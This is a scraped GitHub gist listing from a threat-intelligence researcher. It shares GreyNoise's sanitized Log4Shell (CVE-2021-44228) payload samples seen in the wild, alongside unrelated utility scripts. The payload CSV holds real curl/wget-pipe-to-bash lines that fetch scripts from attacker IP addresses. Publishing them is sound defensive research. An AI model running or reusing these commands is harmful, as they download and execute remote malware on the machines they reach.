n8 nathanqthai
@nathanqthai
nathanqthai / payload_samples.md
Last active March 30, 2023 12:54
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence

Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to exploitation of the Log4J vulnerability in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified whether any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise has observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.

Examples

The following section includes Log4Shell samples seen in the wild.

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

@nathanqthai
nathanqthai / base64_payloads.csv
Last active October 14, 2023 13:21
GreyNoise Log4Shell Payloads
b64decoded hits
(curl -s 45.155.205.233:5874/<IP_ADDRESS>||wget -q -O- 45.155.205.233:5874/<IP_ADDRESS>)|bash 2056
(curl -s 80.71.158.12/lh.sh||wget -q -O- 80.71.158.12/lh.sh)|bash 162
(curl -s 80.71.158.44/lh.sh||wget -q -O- 80.71.158.44/lh.sh)|bash 2
@nathanqthai
nathanqthai / cve_facets.py
Created October 6, 2021 00:02
CVE Histogram
#!/usr/bin/env python3
# vim: set ts=4 sw=4 ts=4 et :
import argparse
import logging
import time
import greynoise
import collections
@nathanqthai
nathanqthai / dashboard.sh
Created July 11, 2019 15:48
an example of a tmux workspace setup script
#!/bin/sh
session="dash$$"
# code editor
tmux new-session -d -s $session
tmux send-keys 'vim' Enter
tmux split-window -h -p 40
tmux send-keys 'htop' Enter
@nathanqthai
nathanqthai / wifi.sh
Created May 22, 2019 18:29
connect to wifi
#!/bin/sh
INTERFACE='wlp5s0'
[ "`whoami`" = root ] || exec sudo "$0" "$@"
wpa_supplicant -B -i ${INTERFACE} -c /etc/wpa_supplicant.conf -D nl80211,wext
dhclient -r ${INTERFACE}
dhclient ${INTERFACE}
@nathanqthai
nathanqthai / mdless.sh
Created May 16, 2019 02:49
CLI preview for Markdown editing
# sudo apt install ruby inotify-tools
# gem install mdless
# https://github.com/ttscoff/mdless
# refreshing preview of markdown files
mdlive() {
while true; do
inotifywait -q -e close_write $1;
clear;
@nathanqthai
nathanqthai / Vagrantfile
Last active May 16, 2019 02:50
A Vagrantfile for provisioning a VM with Ghidra and X11 forwarding enabled.
# -*- mode: ruby -*-
# vi: set ft=ruby :
Vagrant.configure("2") do |config|
# ubuntu 18.04 lts
config.vm.box = "ubuntu/bionic64"
# https://ghidra-sre.org/InstallationGuide.html#Requirements
config.vm.provider "virtualbox" do |v|
v.memory = 4096
@nathanqthai
nathanqthai / pre-commit.sh
Last active April 23, 2023 18:07
a git pre-commit hook to check for API keys
#!/bin/bash
# bash is required: the array syntax below is not POSIX sh
# stash before we mess around
STASH_NAME="pre-commit-$(date +%s)"
git stash save -q --keep-index "$STASH_NAME"
# regexes to find keys
TWILIO_KEY="\bAC[a-z0-9]{32}\b"
TWILIO_SECRET="\b[a-z0-9]{32}\b"
API_REGEXPS=( "$TWILIO_KEY" "$TWILIO_SECRET" )
@nathanqthai
nathanqthai / 38khz_adc.ino
Created September 24, 2017 09:25
idk im a dumpster fire atm
void setup() {
Serial.begin(115200); // use the serial port
TIMSK0 = 0; // turn off timer0 for lower jitter - delay() and millis() killed
ADCSRA = 0xe5; // set the adc to free running mode
ADMUX = 0x40; // use adc0
DIDR0 = 0x01; // turn off the digital input for adc0
}
void loop() {
byte buf[256];
@nathanqthai
nathanqthai / readme.txt
Last active May 19, 2024 01:22
simple tornado server with ssl
to generate example certs
openssl req -x509 -nodes -days 365 -newkey rsa:1024 -keyout host.key -out host.crt
run server:
chmod +x server.py
./server.py
test server:
openssl s_client -connect localhost:8888